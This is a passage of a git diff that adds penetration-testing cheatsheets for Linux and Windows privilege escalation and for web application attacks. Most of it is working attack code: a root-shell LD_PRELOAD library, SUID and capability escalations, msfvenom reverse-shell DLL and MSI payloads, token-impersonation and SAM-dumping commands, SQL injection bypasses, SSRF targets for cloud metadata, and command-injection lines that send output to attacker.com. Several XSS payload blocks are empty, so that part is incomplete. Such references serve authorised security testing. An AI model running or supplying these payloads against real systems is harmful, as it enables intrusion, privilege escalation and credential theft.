env_keep+=LD_PRELOAD +# Create malicious shared object: + +# shell.c +#include +#include +#include + +void _init() { + unsetenv("LD_PRELOAD"); + setgid(0); + setuid(0); + system("/bin/bash"); +} + +# Compile and execute +gcc -fPIC -shared -o shell.so shell.c -nostartfiles +sudo LD_PRELOAD=/tmp/shell.so +``` + +### Sudo CVEs +```bash +# CVE-2019-14287 (sudo < 1.8.28) +sudo -u#-1 /bin/bash + +# Baron Samedit CVE-2021-3156 (sudo 1.8.2-1.8.31p2, 1.9.0-1.9.5p1) +# Use exploit from GitHub +``` + +--- + +## SUID Binaries + +### Find SUID Binaries +```bash +find / -perm -u=s -type f 2>/dev/null +find / -perm -4000 -type f 2>/dev/null +find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null +``` + +### Exploitation +```bash +# Check GTFOBins for SUID exploitation + +# base64 +./base64 /etc/shadow | base64 -d + +# cp +./cp /etc/passwd /tmp/passwd +# modify and copy back + +# find +./find . -exec /bin/sh -p \; -quit + +# vim +./vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' +``` + +### Shared Object Injection +```bash +# Find SUID binary dependencies +strace /path/to/suid-binary 2>&1 | grep -i -E "open|access|no such file" + +# If it loads a missing .so file from writable path: +# Create malicious .so + +# libcalc.c +#include +#include + +static void inject() __attribute__((constructor)); + +void inject() { + system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); +} + +gcc -shared -fPIC libcalc.c -o /path/to/libcalc.so +``` + +--- + +## Capabilities + +```bash +# Find binaries with capabilities +getcap -r / 2>/dev/null + +# Common exploitable capabilities +# cap_setuid+ep - can change UID + +# Python with cap_setuid +python -c 'import os; os.setuid(0); os.system("/bin/bash")' + +# Perl with cap_setuid +perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";' +``` + +--- + +## Cron Jobs + +```bash +# System cron +cat /etc/crontab +ls -la /etc/cron.* + +# User cron +crontab -l + +# Look for: +# - Writable scripts +# - Writable paths in scripts +# - Wildcard injection opportunities + +# Wildcard injection (tar) +# If cron runs: tar czf /tmp/backup.tar.gz * +echo "" > "--checkpoint=1" +echo "" > "--checkpoint-action=exec=sh shell.sh" +``` + +--- + +## NFS Root Squashing + +```bash +# Check NFS exports +cat /etc/exports +showmount -e + +# If no_root_squash is set: +# Mount on attacker machine +mkdir /tmp/nfs +mount -o rw :/share /tmp/nfs + +# Create SUID binary +cp /bin/bash /tmp/nfs/bash +chmod +s /tmp/nfs/bash + +# On target +/share/bash -p +``` + +--- + +## Docker Escape + +```bash +# Check if in docker +cat /proc/1/cgroup | grep docker +ls -la /.dockerenv + +# If user is in docker group +docker run -v /:/mnt --rm -it alpine chroot /mnt sh + +# If docker.sock is accessible +docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh +``` + +--- + +## PATH Hijacking + +```bash +# If SUID binary calls commands without full path: +# 1. Create malicious binary +echo '/bin/bash -p' > /tmp/service +chmod +x /tmp/service + +# 2. Prepend PATH +export PATH=/tmp:$PATH + +# 3. Run SUID binary +``` + +--- + +# Windows Privilege Escalation + +## Initial Enumeration + +### System Information +```cmd +systeminfo +hostname +whoami +whoami /priv +whoami /groups +net user +net user +net localgroup +net localgroup administrators +``` + +### Network Enumeration +```cmd +ipconfig /all +route print +arp -a +netstat -ano +``` + +### Process/Service Enumeration +```cmd +tasklist /SVC +sc query +wmic service list brief +``` + +### Find Passwords +```cmd +findstr /si password *.txt *.ini *.config +reg query HKLM /f password /t REG_SZ /s +reg query HKCU /f password /t REG_SZ /s +``` + +--- + +## Automated Tools + +```powershell +# WinPEAS +.\winPEAS.exe + +# PowerUp +powershell -ep bypass +. .\PowerUp.ps1 +Invoke-AllChecks + +# windows-exploit-suggester +python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo systeminfo.txt + +# Seatbelt +.\Seatbelt.exe -group=all +``` + +--- + +## Service Exploits + +### Unquoted Service Paths +```cmd +# Find unquoted paths +wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" + +# If path is: C:\Program Files\Some Service\service.exe +# Drop malicious exe at: C:\Program.exe or C:\Program Files\Some.exe +``` + +### Weak Service Permissions +```cmd +# Check service permissions +accesschk.exe /accepteula -uwcqv "Authenticated Users" * +accesschk.exe /accepteula -uwcqv * + +# If SERVICE_CHANGE_CONFIG: +sc config binpath= "C:\temp\shell.exe" +sc stop +sc start +``` + +### DLL Hijacking +```powershell +# Find DLL search order issues +# Use Process Monitor to find missing DLLs + +# Create malicious DLL +msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f dll > evil.dll +``` + +--- + +## Token Impersonation + +### Check Privileges +```cmd +whoami /priv +``` + +### SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege +```cmd +# Potato attacks +.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\shell.exe" -t * + +# PrintSpoofer (Windows 10/Server 2019) +.\PrintSpoofer.exe -i -c cmd + +# GodPotato +.\GodPotato.exe -cmd "cmd /c whoami" +``` + +--- + +## Registry Exploits + +### AlwaysInstallElevated +```cmd +# Check if enabled +reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated +reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated + +# If both return 1: +msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi > shell.msi +msiexec /quiet /qn /i shell.msi +``` + +### AutoRun +```cmd +# Check autorun locations +reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run +reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run + +# Check if writable +accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program" +``` + +--- + +## Saved Credentials + +```cmd +# List saved credentials +cmdkey /list + +# RunAs with saved creds +runas /savecred /user:admin C:\temp\shell.exe +``` + +--- + +## SAM/SYSTEM Dump + +```cmd +# If you can access: +C:\Windows\System32\config\SAM +C:\Windows\System32\config\SYSTEM + +# Or backup locations: +C:\Windows\Repair\SAM +C:\Windows\Repair\SYSTEM + +# Extract hashes +impacket-secretsdump -sam SAM -system SYSTEM LOCAL +``` + +--- + +## Kernel Exploits + +```cmd +# Check Windows version +systeminfo | findstr /B /C:"OS Name" /C:"OS Version" + +# Common exploits +# MS16-032 (Secondary Logon Handle) +# MS17-010 (EternalBlue) +``` + +--- + +## Resources + +### Linux +- [GTFOBins](https://gtfobins.github.io/) +- [LinPEAS](https://github.com/carlospolop/PEASS-ng) +- [PayloadsAllTheThings - Linux PrivEsc](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md) +- [HackTricks - Linux PrivEsc](https://book.hacktricks.xyz/linux-hardening/privilege-escalation) + +### Windows +- [LOLBAS](https://lolbas-project.github.io/) +- [WinPEAS](https://github.com/carlospolop/PEASS-ng) +- [PayloadsAllTheThings - Windows PrivEsc](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) +- [HackTricks - Windows PrivEsc](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation) diff --git a/infosec/web-application-security.md b/infosec/web-application-security.md new file mode 100644 index 0000000..85c28f7 --- /dev/null +++ b/infosec/web-application-security.md @@ -0,0 +1,337 @@ +# Web Application Security Cheatsheet + +Quick reference for web application penetration testing, OWASP vulnerabilities, and common attack techniques. + +## OWASP Top 10 (2021) + +| # | Category | Description | +|---|----------|-------------| +| A01 | Broken Access Control | IDOR, privilege escalation, directory traversal | +| A02 | Cryptographic Failures | Weak encryption, sensitive data exposure | +| A03 | Injection | SQLi, XSS, command injection, LDAP injection | +| A04 | Insecure Design | Missing security controls, flawed architecture | +| A05 | Security Misconfiguration | Default creds, verbose errors, XXE | +| A06 | Vulnerable Components | Outdated libraries, unpatched dependencies | +| A07 | Authentication Failures | Weak passwords, session fixation, brute force | +| A08 | Software/Data Integrity | Insecure deserialization, unsigned updates | +| A09 | Logging Failures | Missing audit trails, no alerting | +| A10 | SSRF | Server-side request forgery | + +--- + +## SQL Injection + +### Detection +``` +# Test characters +' +" +# +-- +; +``` + +### Login Bypass +```sql +' OR 1=1-- +' OR 1=1# +admin'-- +admin'# +' OR '1'='1 +" OR "1"="1 +1' or '1' = '1 +1" or "1" = "1 +``` + +### Union-Based +```sql +' UNION SELECT 1,2,3-- +' UNION SELECT null,null,null-- +' UNION SELECT username,password FROM users-- +``` + +### Blind SQLi (Time-Based) +```sql +' AND SLEEP(5)-- +' WAITFOR DELAY '0:0:5'-- +'; IF (1=1) WAITFOR DELAY '0:0:5'-- +``` + +### SQLMap +```bash +# Basic scan +sqlmap -u "http://target.com/page?id=1" --batch + +# With POST data +sqlmap -u "http://target.com/login" --data "user=admin&pass=test" --batch + +# Enumerate databases +sqlmap -u "http://target.com/page?id=1" --dbs + +# Dump specific table +sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump + +# Common options +--random-agent # Random user agent +--level=5 # Increase test level +--risk=3 # Increase risk level +--threads=10 # Parallel requests +--os-shell # OS shell if possible +``` + +--- + +## Cross-Site Scripting (XSS) + +### Types +- **Reflected**: Input immediately returned in response +- **Stored**: Payload saved and executed for other users +- **DOM-based**: Client-side JavaScript processes malicious input + +### Basic Payloads +```html + + + + + +``` + +### WAF Bypass Techniques +```html + + + + + + + + + + + + + + +``` + +### Cookie Stealing +```html + +``` + +--- + +## Server-Side Request Forgery (SSRF) + +### Common Targets +``` +# Localhost +http://127.0.0.1 +http://localhost +http://0.0.0.0 + +# Cloud metadata +http://169.254.169.254/latest/meta-data/ # AWS +http://metadata.google.internal/ # GCP +http://169.254.169.254/metadata/instance # Azure + +# Internal services +http://192.168.0.1 +http://10.0.0.1 +http://172.16.0.1 +``` + +### Bypass Techniques +``` +# Decimal IP +http://2130706433 # 127.0.0.1 + +# Hex IP +http://0x7f000001 # 127.0.0.1 + +# URL encoding +http://127.0.0.1%00@attacker.com + +# DNS rebinding +Use your own DNS server that resolves to internal IP +``` + +--- + +## Directory Traversal / LFI + +### Basic Payloads +``` +../../../etc/passwd +....//....//....//etc/passwd +..%2f..%2f..%2fetc/passwd +%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd +``` + +### Common Targets (Linux) +``` +/etc/passwd +/etc/shadow +/etc/hosts +/proc/self/environ +/var/log/apache2/access.log +~/.ssh/id_rsa +~/.bash_history +``` + +### Common Targets (Windows) +``` +C:\Windows\System32\config\SAM +C:\Windows\repair\SAM +C:\Windows\System32\drivers\etc\hosts +C:\inetpub\logs\LogFiles\ +``` + +### LFI to RCE +``` +# Log poisoning +# 1. Inject PHP into User-Agent +# 2. Include log file +/var/log/apache2/access.log + +# PHP wrappers +php://filter/convert.base64-encode/resource=index.php +php://input # POST data as code +data://text/plain, +``` + +--- + +## Command Injection + +### Detection Characters +``` +; +| +|| +& +&& +`command` +$(command) +``` + +### Payloads +```bash +; whoami +| whoami +|| whoami +& whoami +&& whoami +`whoami` +$(whoami) + +# Blind (time-based) +; sleep 5 +| sleep 5 +& ping -c 5 127.0.0.1 + +# Out-of-band +; curl http://attacker.com/$(whoami) +; nslookup $(whoami).attacker.com +``` + +--- + +## Insecure Direct Object Reference (IDOR) + +### Testing Approach +``` +# Change numeric IDs +/api/user/123 → /api/user/124 + +# Change GUIDs (try sequential or predictable) +/api/doc/abc-123 → /api/doc/abc-124 + +# Parameter manipulation +?user_id=1 → ?user_id=2 +?file=report_1.pdf → ?file=report_2.pdf + +# HTTP method tampering +GET /api/admin → POST /api/admin +``` + +--- + +## Authentication Bypass + +### Default Credentials +``` +admin:admin +admin:password +root:root +test:test +guest:guest +``` + +### Brute Force Protection Bypass +``` +# Header manipulation +X-Forwarded-For: 127.0.0.1 +X-Real-IP: 127.0.0.1 +X-Originating-IP: 127.0.0.1 + +# Username enumeration +# Look for timing differences +# Look for response differences +``` + +### JWT Attacks +```bash +# None algorithm +# Change "alg": "HS256" to "alg": "none" + +# Weak secret +hashcat -a 0 -m 16500 jwt.txt wordlist.txt + +# Key confusion (RS256 to HS256) +# Sign with public key as HMAC secret +``` + +--- + +## Burp Suite Quick Reference + +### Keyboard Shortcuts +| Action | Shortcut | +|--------|----------| +| Send to Repeater | Ctrl+R | +| Send to Intruder | Ctrl+I | +| Forward request | Ctrl+F | +| Drop request | Ctrl+D | + +### Intruder Attack Types +- **Sniper**: Single payload position, one at a time +- **Battering ram**: Same payload all positions +- **Pitchfork**: Different payload lists, parallel +- **Cluster bomb**: All combinations + +--- + +## Useful Tools + +| Tool | Purpose | +|------|---------| +| Burp Suite | Proxy, scanner, manual testing | +| SQLMap | Automated SQL injection | +| ffuf | Web fuzzing | +| Gobuster | Directory brute forcing | +| Nikto | Web server scanner | +| WPScan | WordPress scanner | +| Nuclei | Template-based scanning | + +--- + +## Resources + +- [PortSwigger Web Security Academy](https://portswigger.net/web-security) +- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/) +- [HackTricks Web](https://book.hacktricks.xyz/) +- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)